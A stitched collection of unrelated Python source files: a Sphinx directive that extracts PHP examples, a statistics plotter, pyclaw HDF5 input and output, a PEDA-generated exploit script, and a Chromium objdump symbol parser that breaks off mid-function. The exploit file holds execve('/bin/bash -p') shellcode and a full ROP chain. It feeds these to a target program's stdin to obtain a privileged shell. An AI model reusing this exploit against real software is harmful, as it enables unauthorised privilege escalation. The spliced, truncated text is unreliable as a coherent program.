        self.end_function = "    }\n"
        self.begin_tag = "        // @begin\n"
        self.end_tag = "        // @end\n"
        example_file = self.arguments[0].strip()
        example_name = self.arguments[1].strip()
        if not example_name:
            raise ValueError("Must specify both an example file and example name")
        contents = self.load_example(example_file, example_name)
        rawtext = self.generate_rst(contents)
        tab_width = 4
        include_lines = statemachine.string2lines(
            rawtext, tab_width, convert_whitespace=1)
        # Inject the generated reST into the current document.
        self.state_machine.insert_input(
            include_lines, os.path.abspath(__file__))
        return []

    def load_example(self, example_file, example_name):
        """Loads the contents of an example and strips out non-example parts"""
        key = example_file + '.' + example_name
        # Check if this example is cached already
        if key in example_cache:
            return example_cache[key]
        # Not cached, so index the example file functions
        path = os.path.abspath(__file__ + "/../../../../tests/Aws/Tests/" + example_file)
        f = open(path, 'r')
        # in_example doubles as state flag and cache key of the example
        # currently being scanned (falsy string = not inside a function).
        in_example = False
        capturing = False
        buffer = ""
        # Scan each line of the file and create example hashes
        for line in f:
            if in_example:
                if line == self.end_function:
                    # End of the test method: store whatever was captured.
                    # (The inner `if in_example:` is always true here.)
                    if in_example:
                        example_cache[in_example] = buffer
                        buffer = ""
                        in_example = False
                elif line == self.begin_tag:
                    # Look for the opening // @begin tag to begin capturing
                    buffer = ""
                    capturing = True
                elif line == self.end_tag:
                    # Look for the optional closing tag to stop capturing
                    capturing = False
                elif capturing:
                    buffer += line
            elif "public function test" in line:
                # Grab the function name from the line and keep track of the
                # name of the current example being captured
                current_name = re.search('function (.+)\s*\(', line).group(1)
                in_example = example_file + "." + current_name
        f.close()
        # Raises KeyError if the requested example was never found in the file.
        return example_cache[key]

    def generate_rst(self, contents):
        # Indentation of the captured PHP lines provides the literal block body.
        rawtext = ".. code-block:: php\n\n" + contents
        return rawtext
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import matplotlib.pylab as plt
import numpy as np
from collections import defaultdict
import log_to_files
def movingaverage(interval, window_size):
    """Smooth *interval* with a flat window of *window_size* samples ('valid' mode)."""
    size = int(window_size)
    kernel = np.full(size, 1.0 / window_size)
    return np.convolve(interval, kernel, 'valid')
def readlines(filepath):
    """Read one float per line from *filepath* and return them as a list."""
    values = []
    with open(filepath) as handle:
        for raw in handle:
            values.append(float(raw.strip()))
    return values
def read_run_stats(instance_name):
statslist = ["death", "fight", "migration", "reproduction"]
# statslist = ["reproduction"]
island_statslist = ["fitness"] #, "population"] #, "stddevsum", "stddevmin"]
common_data = {}
island_data = []
# if skel stats, remove migration
# statslist.remove("migration")
data = {}
for filename in island_statslist:
filepath = os.path.join(instance_name, filename + ".txt")
# print filepath, readlines(filepath)
try:
data[filename] = readlines(filepath)
except:
print 'exception:', filename, ' stats not present'
island_data.append(data)
for filename in statslist:
filepath = os.path.join(instance_name, filename + ".txt")
# print filepath, readlines(filepath)
try:
common_data[filename] = readlines(filepath)
except:
print 'exception:', filename, ' stats not present'
return common_data, island_data
def read_all_runs_stats(instance_names):
    """Collect (common, island) statistics for every named run instance."""
    all_stats = []
    for name in instance_names:
        all_stats.append(read_run_stats(name))
    return all_stats
def plot_data(data_tuples, figure_name):
    """Plot up to rows*cols (label, series) tuples on one subplot grid.

    Each series is drawn against its sample index; *figure_name* becomes
    the figure suptitle.
    """
    rows = 2
    cols = 2
    fig, ax = plt.subplots(rows, cols)
    for i in range(rows):
        for j in range(cols):
            # Row-major flat index. The original used i*rows+j, which only
            # worked because rows == cols; i*cols+j is correct in general.
            idx = i * cols + j
            if len(data_tuples) > idx:
                label, data = data_tuples[idx]
                ax[i][j].plot(range(len(data)), data)
                ax[i][j].set_title(label)
    fig.suptitle(figure_name, fontsize=18)
    fig.tight_layout()
# Named reductions that can be applied across islands per time step;
# 'spread' is the max-min range of the values.
func_map = dict([('mean', np.mean), ('max', max),
                 ('sum', sum), ('min', min),
                 ('median', np.median),
                 ('spread', lambda elem: max(elem) - min(elem))
                 ])


def get_func(func):
    """Resolve *func*: look up names in func_map, pass callables through.

    Uses isinstance instead of ``type(func) == str`` so str subclasses are
    also accepted.
    """
    return func_map[func] if isinstance(func, str) else func
def merge_stats(islands, func, stat):
    """Combine one statistic across islands, time step by time step.

    *islands* is a list of dicts, e.g.
    [{'fitness': [1, 2, 3]}, {'fitness': [4, 5, 6]}]. *func* is either a
    callable or one of the names understood by get_func ('mean', 'max',
    'min', 'sum', 'median', 'spread'). Returns a list with func applied to
    each position across all islands.
    """
    reduce_fn = get_func(func)
    per_island = [island[stat] for island in islands]
    merged = []
    for step_values in zip(*per_island):
        merged.append(reduce_fn(step_values))
    return merged
class DataToPlot(object):
    """One named data series plus the metadata needed to plot it."""

    def __init__(self, data, attr, scale='linear', func=None, label=None):
        # Every series except raw fitness is smoothed before plotting.
        if attr != "fitness":
            data = movingaverage(data, 30)
        self.data = data
        self.func = func
        self.attr = attr
        self.scale = scale
        if label is not None:
            self.label = label
        elif func is None:
            self.label = attr
        else:
            self.label = str(func) + ' ' + attr

    @classmethod
    def from_list(cls, data, func, attr, scale='linear', label=None):
        """Build a series by first merging per-island stats with *func*."""
        merged = merge_stats(data, func, attr)
        return cls(merged, attr, scale=scale, func=func, label=label)

    def __str__(self):
        return self.pprint(10)

    def __repr__(self):
        return self.pprint(1)

    def pprint(self, limit):
        """Short preview: label, first *limit* values, truncation note."""
        preview = self.label + ": " + str(self.data[:limit])
        if len(self.data) >= limit:
            preview += ' ... ' + str(len(self.data) - limit) + ' more'
        return preview
def plot_data_objs(data_to_plot_list, figure_name, same=False):
    """Plot up to two DataToPlot objects, one subplot per series.

    *figure_name* is "<topology>:<title...>"; the topology prefix becomes
    the line label, the remainder the figure suptitle. When *same* is True
    successive calls draw onto the same numbered figure so several
    topologies can be compared on shared axes.
    """
    rows = 2
    cols = 1
    topo = figure_name.split(':')[0]
    # print "topo:",topo
    # print "figname:",figure_name
    if same:
        # Reuse the figure identified by the title suffix so repeated calls
        # accumulate lines instead of opening new windows.
        fig_id = figure_name.split(':')[-1]
        fig, ax = plt.subplots(rows, cols, num=fig_id)
    else:
        fig, ax = plt.subplots(rows, cols)
    for i in range(rows):
        # for j in range(cols):
        idx = i #*rows+j
        if len(data_to_plot_list) > idx:
            obj = data_to_plot_list[idx]
            # A log scale cannot display non-positive values: mirror an
            # all-non-positive series into the positive range first.
            if obj.scale == 'log' and max(obj.data) <= 0:
                ydata = map(lambda x: -x, obj.data)
            else:
                ydata = obj.data
            ax[idx].plot(range(len(obj.data)), ydata, label=topo, linewidth=2.0)
            ax[idx].set_yscale(obj.scale)
            ax[idx].set_title(obj.label)
            if same:
                # NOTE(review): a legend is created then immediately hidden;
                # presumably the combined figure legend added in run() is the
                # one meant to be visible — confirm.
                ax[idx].legend(loc='lower left', shadow=True)
                ax[idx].legend().set_visible(False)
    # fig.legend(loc='lower left', shadow=True)
    if fig._suptitle is None:
        suptitle = ':'.join(figure_name.split(':')[1:])
        fig.suptitle(suptitle, fontsize=18)
    # fig.tight_layout()
def fetch_instance(instance_name):
    """Load one run instance and wrap its series as DataToPlot objects.

    Returns [best island fitness (log scale), smoothed reproduction count].
    """
    common, islands = read_run_stats(instance_name)
    best_fitness = DataToPlot.from_list(islands, 'max', 'fitness', scale='log')
    reproduction = DataToPlot(common["reproduction"], "reproduction")
    return [best_fitness, reproduction]
def merge_instances(instances, func):
    """Fold matching series from several run instances into one series each.

    *instances* is a list of per-run DataToPlot lists with identical layout;
    *func* (name or callable) is applied across runs at every time step.
    """
    reduce_fn = get_func(func)
    merged = []
    for series_group in zip(*instances):
        template = series_group[0]
        # Apply the reduction across runs, position by position.
        combined = [reduce_fn(values)
                    for values in zip(*[s.data for s in series_group])]
        new_label = reduce_fn.func_name + ' ' + template.label  # py2 attribute
        merged.append(DataToPlot(combined, template.attr,
                                 scale=template.scale, func=template.func,
                                 label=new_label))
    return merged
def plot_stats(instance_names, func, same, plot_label=None):
    """Plot merged statistics for a set of run instances, 4 series per figure."""
    instances = [fetch_instance(name) for name in instance_names]
    result_to_plot = merge_instances(instances, func)
    if plot_label is None:
        # Default label: top-level directory of the first instance path.
        plot_label = instance_names[0].split(os.path.sep)[0]
    step = 4  # subplots per figure
    for start in range(0, len(result_to_plot), step):
        label = ':'.join([plot_label, func,
                          str(len(instance_names)) + "runs",
                          str(start/step + 1)])
        plot_data_objs(result_to_plot[start:start + step], label, same)
# show()
def main(instance_names=None, func='mean', same=False, plot_label=None):
    """Entry point: plot statistics for the given run instances.

    The mutable default argument ([]) was replaced with the None sentinel
    to avoid the shared-default pitfall; call semantics are unchanged.
    """
    if instance_names is None:
        instance_names = []
    plot_stats(instance_names, func, same, plot_label)
def zeus(directory='.', proj="emas", func='mean'):
    """Convert raw logfiles in *directory* into per-run stat directories.

    Every file named ``<proj>*`` that is not already a ``*_run`` output is
    parsed into ``<logfile>_run``; returns all run directories found
    afterwards.
    """
    for entry in os.listdir(directory):
        if not entry.startswith(proj) or entry.endswith('_run'):
            continue
        logfile = os.path.join(directory, entry)
        log_to_files.parse(logfile, logfile + '_run')
    run_dirs = []
    for entry in os.listdir(directory):
        if entry.endswith('_run'):
            run_dirs.append(os.path.join(directory, entry))
    return run_dirs
def trim_plot_labels(first_instances):
    """Derive short, distinguishing plot labels from instance paths.

    For a single instance the label is its parent directory. For several,
    only the path components on which the instances disagree are kept and
    re-joined per instance.
    """
    sep = os.path.sep
    if len(first_instances) == 1:
        parent_parts = first_instances[0].split(sep)[:-1]
        return [sep.join(parent_parts)]
    component_rows = [inst.split(sep)[:-1] for inst in first_instances]
    differing = []
    for column in zip(*component_rows):
        # Keep this component position only when the instances differ on it.
        if any(c != column[0] for c in column):
            differing.append(column)
    return [sep.join(parts) for parts in zip(*differing)]
def run():
    """Command-line driver: plot averaged stats for every given directory."""
    proj = 'emas'
    func = 'mean'
    directories = sys.argv[1:]
    # A trailing non-directory argument names the output image instead of a
    # data directory; drop it from the directory list.
    if not os.path.isdir(sys.argv[-1]):
        directories = directories[:-1]
    instance_names_in_directories = []
    for directory in directories:
        logfiles = [os.path.join(directory,name) for name in os.listdir(directory) if name.startswith(proj) and not name.endswith('_run')]
        instance_names = [os.path.join(directory,name) for name in os.listdir(directory) if name.endswith('_run')]
        # Some logfiles have not been converted into *_run directories yet:
        # run the converter for this directory.
        if len(logfiles) != len(instance_names):
            instance_names = zeus(directory, proj, func)
        instance_names_in_directories.append(instance_names)
    # print instance_names_in_directories
    first_instances = map(lambda x: x[0], instance_names_in_directories)
    plot_labels = trim_plot_labels(first_instances)
    for instance_names, plot_label in zip(instance_names_in_directories, plot_labels):
        if len(plot_label) == 0:
            plot_label = None
        # same=True: draw every directory's series onto the shared figures.
        main(instance_names, func, True, plot_label)
    fig, axes = plt.subplots(2, 1, num=1)
    ax = axes[0]
    l = ax.legend()#.set_visible(False)
    # position = 'lower right'
    if l is None:
        pass
    elif l.legendHandles is not None:
        # Promote the per-axes legend entries to a single figure legend.
        position = 'center left'
        fig.legend(l.legendHandles, [x._text for x in l.texts], position)
        l.set_visible(False)
    # fig.tight_layout()
    # i=1
# i=1
if __name__ == '__main__':
    # plt.legend()
    if len(sys.argv) < 2:
        print 'Usage:'
        print '\tpython stat_plotter.py {<directory_with_logfiles>|<directory_with_subdirectories} ...'
    else:
        run()
        # Interactive display when the last argument is a directory;
        # otherwise the last argument names the output image file.
        if os.path.isdir(sys.argv[-1]):
            plt.show()
        else:
            from subprocess import call
            call(["mkdir", "-p", "plots"])
            ext = "svg"
            plt.savefig("plots/"+sys.argv[-1]+"."+ext, bbox_inches='tight')
| |
#!/usr/bin/env python
# encoding: utf-8
r"""
Routines for reading and writing a HDF5 output file
This module reads and writes hdf5 files via either of the following modules:
h5py - http://code.google.com/p/h5py/
PyTables - http://www.pytables.org/moin
It will first try h5py and then PyTables and use the correct calls
according to whichever is present on the system. We recommend that you use
h5py as it is a minimal wrapper to the HDF5 library and will create files
that are more easily read by other HDF5 tools.
To install either, you must also install the hdf5 library from the website:
http://www.hdfgroup.org/HDF5/release/obtain5.html
:Authors:
Kyle T. Mandli (2009-02-13) Initial version
"""
# ============================================================================
# Copyright (C) 2009 Kyle T. Mandli <mandli@amath.washington.edu>
#
# Distributed under the terms of the Berkeley Software Distribution (BSD)
# license
# http://www.opensource.org/licenses/
# ============================================================================
import os,sys
import logging
import numpy as np
import pyclaw.solution
logger = logging.getLogger('io')
# Import appropriate hdf5 package: prefer h5py, fall back to PyTables.
use_h5py = False
use_PyTables = False
try:
    import h5py
    use_h5py = True
except ImportError:
    pass
# BUG FIX: PyTables is the fallback, so it must be tried only when h5py is
# NOT available. The original tested `if use_h5py:`, which attempted (and
# on failure raised about) PyTables precisely when h5py had already been
# imported successfully.
if not use_h5py:
    try:
        import tables
        use_PyTables = True
    except ImportError:
        error_msg = ("Could not import h5py or PyTables, please install " +
                     "either h5py or PyTables. See the doc_string for more " +
                     "information.")
        raise Exception(error_msg)
if not use_h5py and not use_PyTables:
    logging.critical("Could not import h5py or PyTables!")
def write_hdf5(solution,frame,path,file_prefix='claw',write_aux=False,
               options=None):
    r"""
    Write out a Solution to a HDF5 file.

    :Input:
    - *solution* - (:class:`~pyclaw.solution.Solution`) Pyclaw solution
      object to input into
    - *frame* - (int) Frame number
    - *path* - (string) Root path
    - *file_prefix* - (string) Prefix for the file name. ``default = 'claw'``
    - *write_aux* - (bool) Boolean controlling whether the associated
      auxiliary array should be written out. ``default = False``
    - *options* - (dict) Optional argument dictionary, see
      `HDF5 Option Table`_

    .. _`HDF5 Option Table`:

    +-----------------+------------------------------------------------------+
    | Key | Value |
    +=================+======================================================+
    | compression | (None, string ["gzip" | "lzf" | "szip"] or int 0-9) |
    | | Enable dataset compression. DEFLATE, LZF and (where |
    | | available) SZIP are supported. An integer is |
    | | interpreted as a GZIP level for backwards |
    | | compatibility. |
    +-----------------+------------------------------------------------------+
    |compression_opts | (None, or special value) Setting for compression |
    | | filter; legal values for each filter type are: |
    | | |
    | | - *gzip* - (int) 0-9 |
    | | - *lzf* - None allowed |
    | | - *szip* - (tuple) 2-tuple ('ec'|'nn', even integer |
    | | 0-32) |
    | | |
    | | See the filters module for a detailed description of |
    | | each of these filters. |
    +-----------------+------------------------------------------------------+
    | chunks | (None, True or shape tuple) Store the dataset in |
    | | chunked format. Automatically selected if any of the |
    | | other keyword options are given. If you don't provide|
    | | a shape tuple, the library will guess one for you. |
    +-----------------+------------------------------------------------------+
    | shuffle | (True/False) Enable/disable data shuffling, which can|
    | | improve compression performance. Automatically |
    | | enabled when compression is used. |
    +-----------------+------------------------------------------------------+
    | fletcher32 | (True/False) Enable Fletcher32 error detection; may |
    | | be used with or without compression. |
    +-----------------+------------------------------------------------------+
    """
    # Option parsing: overlay caller-supplied values on the defaults.
    # This replaces the original exec()-based injection of local variables,
    # which was fragile and cannot bind function locals on Python 3. The
    # mutable default argument ``options={}`` was also replaced with None.
    if options is None:
        options = {}
    option_defaults = {'compression':None,'compression_opts':None,
                       'chunks':None,'shuffle':False,'fletcher32':False}
    opts = dict(option_defaults)
    opts.update(options)
    compression = opts['compression']
    compression_opts = opts['compression_opts']
    chunks = opts['chunks']
    shuffle = opts['shuffle']
    fletcher32 = opts['fletcher32']

    # File name
    filename = os.path.join(path,'%s%s.hdf' %
                            (file_prefix,str(frame).zfill(4)))

    # Write out using h5py
    if use_h5py:
        f = h5py.File(filename,'w')
        # For each grid, write out attributes
        for grid in solution.grids:
            # Create group for this grid
            subgroup = f.create_group('grid%s' % grid.gridno)
            # General grid properties
            for attr in ['t','meqn','mbc','gridno','level']:
                if hasattr(grid,attr):
                    if getattr(grid,attr) is not None:
                        subgroup.attrs[attr] = getattr(grid,attr)
            # Add the dimension names as a attribute
            subgroup.attrs['dimensions'] = grid.get_dim_attribute('name')
            # Dimension properties
            for dim in grid.dimensions:
                for attr in ['n','lower','d','upper','mthbc_lower',
                             'mthbc_upper','units']:
                    if hasattr(dim,attr):
                        if getattr(dim,attr) is not None:
                            attr_name = '%s.%s' % (dim.name,attr)
                            subgroup.attrs[attr_name] = getattr(dim,attr)
            # Write out q
            subgroup.create_dataset('q',data=grid.q,
                                    compression=compression,
                                    compression_opts=compression_opts,
                                    chunks=chunks,shuffle=shuffle,
                                    fletcher32=fletcher32)
            if write_aux and grid.maux > 0:
                subgroup.create_dataset('aux',data=grid.aux,
                                        compression=compression,
                                        compression_opts=compression_opts,
                                        chunks=chunks,shuffle=shuffle,
                                        fletcher32=fletcher32)
        # Flush and close the file
        f.close()
    # Write out using PyTables
    elif use_PyTables:
        # f = tables.openFile(filename, mode = "w", title = options['title'])
        logging.critical("PyTables has not been implemented yet.")
        raise IOError("PyTables has not been implemented yet.")
    else:
        err_msg = "No hdf5 python modules available."
        logging.critical(err_msg)
        raise Exception(err_msg)
def read_hdf5(solution,frame,path='./',file_prefix='claw',read_aux=True,
              options=None):
    r"""
    Read in a HDF5 file into a Solution

    :Input:
    - *solution* - (:class:`~pyclaw.solution.Solution`) Pyclaw object to be
      output
    - *frame* - (int) Frame number
    - *path* - (string) Root path
    - *file_prefix* - (string) Prefix for the file name. ``default = 'claw'``
    - *write_aux* - (bool) Boolean controlling whether the associated
      auxiliary array should be written out. ``default = False``
    - *options* - (dict) Optional argument dictionary, unused for reading.
    """
    # No options are currently recognized when reading; the dict parameter
    # is kept for interface symmetry with write_hdf5. (This replaces the
    # original exec()-based parsing over an empty defaults dict, which was
    # a no-op; the mutable {} default was replaced with None.)
    if options is None:
        options = {}

    # File name
    filename = os.path.join(path,'%s%s.hdf' %
                            (file_prefix,str(frame).zfill(4)))

    if use_h5py:
        f = h5py.File(filename,'r')
        for subgroup in f.iterobjects():
            # Construct each dimension
            dimensions = []
            dim_names = subgroup.attrs['dimensions']
            for dim_name in dim_names:
                # Create dimension
                dim = pyclaw.solution.Dimension(dim_name,
                    subgroup.attrs["%s.lower" % dim_name],
                    subgroup.attrs["%s.upper" % dim_name],
                    subgroup.attrs["%s.n" % dim_name])
                # Optional attributes
                for attr in ['mthbc_lower','mthbc_upper','units']:
                    attr_name = "%s.%s" % (dim_name,attr)
                    if subgroup.attrs.get(attr_name, None):
                        setattr(dim,attr,subgroup.attrs[attr_name])
                dimensions.append(dim)
            # Create grid
            grid = pyclaw.solution.Grid(dimensions)
            # Fetch general grid properties
            for attr in ['t','meqn','gridno','level']:
                setattr(grid,attr,subgroup.attrs[attr])
            # Read in q. Ellipsis indexing loads the full dataset whatever
            # its rank (replaces building a ':,:,...' string for exec()).
            grid.q = subgroup['q'][...]
            # Read in aux if applicable
            if read_aux and subgroup.get('aux',None) is not None:
                grid.aux = subgroup['aux'][...]
            solution.grids.append(grid)
        # Flush and close the file
        f.close()
    elif use_PyTables:
        # f = tables.openFile(filename, mode = "r", title = options['title'])
        logging.critical("PyTables has not been implemented yet.")
        raise IOError("PyTables has not been implemented yet.")
    else:
        err_msg = "No hdf5 python modules available."
        logging.critical(err_msg)
        raise Exception(err_msg)
| |
#!/usr/bin/env python
#
# Template for local stdin exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time
"""
Registers contain pattern buffer:
EIP+0 found at offset: 36
EBX+0 found at offset: 20
EDI+0 found at offset: 28
EBP+0 found at offset: 32
ESI+0 found at offset: 24
Registers point to pattern buffer:
[EDX] --> offset 4 - size ~203
[ECX] --> offset 4 - size ~203
[ESP] --> offset 40 - size ~203
Pattern buffer found at:
0xffffcf2c : offset 4 - size 555 ($sp + -0x24 [-9 dwords])
References to pattern buffer found at:
0xffffce68 : 0xffffcf2c ($sp + -0xe8 [-58 dwords])
0xffffcea8 : 0xffffcf2c ($sp + -0xa8 [-42 dwords])
0xffffced8 : 0xffffcf2c ($sp + -0x78 [-30 dwords])
0xffffcef0 : 0xffffcf2c ($sp + -0x60 [-24 dwords])
0xffffcf04 : 0xffffcf2c ($sp + -0x4c [-19 dwords])
0xffffcf1c : 0xffffcf2c ($sp + -0x34 [-13 dwords])
"""
# 32-bit Linux execve("/bin//bash", ["/bin//bash", "-p"], NULL) shellcode:
# eax=0xb, int 0x80. The pushes build "/bin/bash" and "-p" on the stack;
# the matching assembly listing appears further down in this file.
sc = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
def usage():
    """Print command-line usage for this exploit template."""
    print "Usage: %s target_program" % sys.argv[0]
    return
def pattern(size=1024, start=0):
    """Return *size* characters of the cyclic pattern from pattern.txt.

    Falls back to a plain run of 'A's when the pattern file is missing or
    unreadable (narrowed from a bare except; the local previously shadowed
    the builtin ``bytes``).
    """
    try:
        data = open("pattern.txt").read(size + start)
        return data[start:]
    except (IOError, OSError):
        return "A" * size
def nops(size=1024):
    """Return a NOP (0x90) sled of the requested length."""
    return size * "\x90"
def int2hexstr(num, intsize=4):
    """Pack *num* little-endian as 4 or 8 bytes (signed format when negative)."""
    if intsize == 8:
        fmt = "<q" if num < 0 else "<Q"
    else:
        fmt = "<l" if num < 0 else "<L"
    return struct.pack(fmt, num)

# Short alias used throughout the exploit code.
i2hs = int2hexstr
def list2hexstr(intlist, intsize=4):
    """Concatenate a mixed list of raw strings and integers (packed LE)."""
    chunks = []
    for item in intlist:
        if isinstance(item, str):
            chunks.append(item)
        else:
            chunks.append(int2hexstr(item, intsize))
    return "".join(chunks)

# Short alias used throughout the exploit code.
l2hs = list2hexstr
from subprocess import *
'''
push $0xb
pop %eax
cltd
push %edx
pushw $0x702d
mov %esp,%ecx
push %edx
push $0x68
push $0x7361622f
push $0x6e69622f
mov %esp,%ebx
push %edx
push %ecx
push %ebx
mov %esp,%ecx
int $0x80
'''
def exploit(vuln):
    """Build the ROP payload, write it to 'inp', and drive the target.

    The gadget offsets below are relative to a module assumed loaded at
    *base*. The chain prepares registers and stack for
    execve("/bin/bash", [..., "-p"], NULL) and triggers it with int 0x80
    (eax = 0xb). Byte layout is load-bearing: do not reorder.
    """
    base = 0x0f000000
    # 0x0000051b: int 0x80 ; (1 found)
    push_ebx = base + 0x0000112a # debile
    push_ecx = base + 0x000081c4 # ...
    add_esi_eax = base + 0x000077e0
    add_ecx_ebp = base + 0x00002416
    pop_eax = base + 0x00001733
    pop_ebx = base + 0x00000cd3
    pop_ecx = base + 0x00002771
    pop_edx = base + 0x000006f5
    pop_esi = base + 0x000023d5
    pop_ebp = base + 0x00002de2
    dec_eax = base + 0x0000482f
    dec_ebx = base + 0x0000351b
    x_eax_ebx = base + 0x00003380
    x_eax_ecx = base + 0x00004e1d
    x_eax_edx = base + 0x0000198d
    x_eax_esi = base + 0x0000191c
    x_eax_edi = base + 0x00002bd3
    x_pesi_ebx = base + 0x000049fc
    mov_pecx_ebx = base + 0x00006868
    save_esp_ecx = base + 0x00006aba
    int80 = base + 0x51b
    # edx = 0
    rop_stack = i2hs(pop_edx)
    rop_stack+= i2hs(0x0)
    # ebx = esp + off
    # string -> esi
    rop_stack+= i2hs(save_esp_ecx)
    rop_stack+= i2hs(pop_ebp)
    rop_stack+= i2hs(0xd4 - 0x48) # first arg
    rop_stack+= i2hs(add_ecx_ebp)
    rop_stack+= i2hs(x_eax_ecx)
    rop_stack+= i2hs(x_eax_ebx)
    rop_stack+= i2hs(save_esp_ecx)
    rop_stack+= i2hs(pop_ebp)
    rop_stack+= i2hs(0xc8 - 0x60) # 1st arg
    rop_stack+= i2hs(add_ecx_ebp)
    rop_stack+= i2hs(mov_pecx_ebx) # [off] = val
    rop_stack+= i2hs(x_eax_ebx)
    rop_stack+= i2hs(x_eax_esi)
    rop_stack+= i2hs(x_eax_ecx)
    rop_stack+= i2hs(x_eax_edi)
    # ecx = esp + off
    # debut struct
    rop_stack+= i2hs(save_esp_ecx)
    rop_stack+= i2hs(pop_ebp)
    rop_stack+= i2hs(0xe4 - 0x84) # offset -p
    rop_stack+= i2hs(add_ecx_ebp)
    rop_stack+= i2hs(x_eax_ecx)
    rop_stack+= i2hs(x_eax_ebx)
    rop_stack+= i2hs(save_esp_ecx)
    rop_stack+= i2hs(pop_ebp)
    rop_stack+= i2hs(0xcc - 0x9c) # 2nd arg
    rop_stack+= i2hs(add_ecx_ebp)
    rop_stack+= i2hs(mov_pecx_ebx) # [off] = val
    rop_stack+= i2hs(x_eax_esi) # restore
    rop_stack+= i2hs(x_eax_ebx)
    rop_stack+= i2hs(x_eax_edi)
    rop_stack+= i2hs(x_eax_ecx)
    # eax = 0xb
    rop_stack+= i2hs(pop_eax)
    rop_stack+= i2hs(0xb)
    # int 0x80
    rop_stack+= i2hs(int80)
    # Two 4-byte fillers, then the execve argument data the gadgets index
    # into: "/bin" "/bas" "h\0", the "-p" flag, and NUL terminators.
    rop_stack+= "JONK"
    rop_stack+= "JUNK"
    rop_stack+= i2hs(0x0)
    rop_stack+= i2hs(0x6e69622f)
    rop_stack+= i2hs(0x7361622f)
    rop_stack+= i2hs(0x68)
    rop_stack+= i2hs(0x0)
    rop_stack+= i2hs(0x702d)
    rop_stack+= i2hs(0x0)
    #rop_stack+= i2hs()
    padding = pattern(0)
    payload = [padding]
    payload += [ "AAAA" + nops(32) + rop_stack] # put your payload here
    payload = list2hexstr(payload)
    # Write the payload to 'inp' for reuse, then feed it on the target's stdin.
    f = open("inp", "w")
    f.write(payload)
    f.close()
    env = {"PEDA":nops()}
    args = sys.argv[1:]
    # Unlimited stack/core to ease debugging of the crash.
    resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
    resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
    P = Popen(args, stdin=PIPE)
    P.stdin.write(payload + "\n")
    # Forward our stdin to the child until it exits, then report its status.
    while True:
        line = sys.stdin.readline()
        P.poll()
        ret = P.returncode
        if ret is None:
            P.stdin.write(line)
        else:
            if ret == -11:
                print "Child program crashed with SIGSEGV"
            else:
                print "Child program exited with code %d" % ret
            break
if __name__ == "__main__":
    # The target program to exploit is the single required argument.
    if len(sys.argv) < 2:
        usage()
    else:
        exploit(sys.argv[1])
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities to get and manipulate symbols from a binary."""
import collections
import logging
import os
import re
import subprocess
import sys
import cygprofile_utils
# Symbol emitted by the linker script to mark the start of .text; used as an
# anchor when translating offsets from profile dumps.
START_OF_TEXT_SYMBOL = 'linker_script_start_of_text'
_SRC_PATH = os.path.abspath(os.path.join(
    os.path.dirname(__file__), os.pardir, os.pardir))
# Prefix of the bundled LLVM binutils (llvm-objdump, llvm-cxxfilt, ...).
_TOOL_PREFIX = os.path.join(_SRC_PATH, 'third_party', 'llvm-build',
                            'Release+Asserts', 'bin', 'llvm-')
# Cap on warnings emitted through cygprofile_utils.WarningCollector.
_MAX_WARNINGS_TO_PRINT = 200
SymbolInfo = collections.namedtuple('SymbolInfo', ('name', 'offset', 'size',
'section'))
# Regular expression to match lines printed by 'objdump -t -w'. An example of
# such line looks like this:
# 018db2de l F .text 00000060 .hidden _ZN8SkBitmapC2ERKS_
#
# The regex intentionally allows matching more than valid inputs. This gives
# more protection against potentially incorrectly silently ignoring unmatched
# input lines. Instead a few assertions early in _FromObjdumpLine() check the
# validity of a few parts matched as groups.
_OBJDUMP_LINE_RE = re.compile(
r'''
# The offset of the function, as hex.
(?P<offset>^[0-9a-f]+)
# The space character.
[ ]
# The 7 groups of flag characters, one character each.
(
(?P<assert_scope>.) # Global, local, unique local, etc.
(?P<assert_weak_or_strong>.)
(?P<assert_4spaces>.{4}) # Constructor, warning, indirect ref,
# debugger symbol.
(?P<symbol_type>.) # Function, object, file or normal.
)
[ ]
# The section name should start with ".text", can be ".text.foo". With LLD,
# and especially LTO the traces of input sections are not preserved. Support
# ".text.foo" for a little longer time because it is easy.
(?P<section>.text[^0-9a-f]*)
(?P<assert_tab> \s+)
# The size of the symbol, as hex.
(?P<size>[0-9a-f]+)
[ ]+
# Hidden symbols should be treated as usual.
(.hidden [ ])?
# The symbol name.
(?P<name>.*)
$
''', re.VERBOSE)
def _FromObjdumpLine(line):
    """Create a SymbolInfo by parsing a properly formatted objdump output line.

    Args:
      line: line from objdump

    Returns:
      An instance of SymbolInfo if the line represents a symbol, None
      otherwise.
    """
    match = _OBJDUMP_LINE_RE.match(line)
    if match is None:
        return None

    # Sanity-check the loosely matched flag fields. A symbol can be
    # (g)lobal, (l)ocal, or neither (a space).
    assert match.group('assert_scope') in (' ', 'g', 'l'), line
    assert match.group('assert_weak_or_strong') in (' ', 'w'), line
    assert match.group('assert_tab') == '\t', line
    assert match.group('assert_4spaces') == ' ' * 4, line

    name = match.group('name')
    offset = int(match.group('offset'), 16)
    # The start-of-text label is kept (size 0): it is needed later for
    # translating offsets from the profile dumps.
    if name == START_OF_TEXT_SYMBOL:
        return SymbolInfo(name=name, offset=offset, section='.text', size=0)

    # 'Normal' symbols (type ' ') seen so far are function-local labels:
    # skip them. File symbols ('f') never appear in the binaries we parse,
    # so treat one as a parse error.
    symbol_type = match.group('symbol_type')
    if symbol_type == ' ':
        return None
    assert symbol_type != 'f', line

    # The ELF size may be 0 for functions from .S files lacking a '.size'
    # directive; keep whatever the field says.
    size = int(match.group('size'), 16)

    # Allow '$' only in non-initial positions (Clang lambda manglings) and
    # reject spaces, which would indicate extra flags such as .internal.
    assert re.match('^[a-zA-Z0-9_.][a-zA-Z0-9_.$]*$', name), name
    return SymbolInfo(name=name, offset=offset, section=match.group('section'),
                      size=size)
def _SymbolInfosFromStream(objdump_lines):
    """Parses the output of objdump, and get all the symbols from a binary.

    Args:
      objdump_lines: An iterable of lines

    Returns:
      A list of SymbolInfo.
    """
    symbol_infos = []
    name_to_offsets = collections.defaultdict(list)
    for raw_line in objdump_lines:
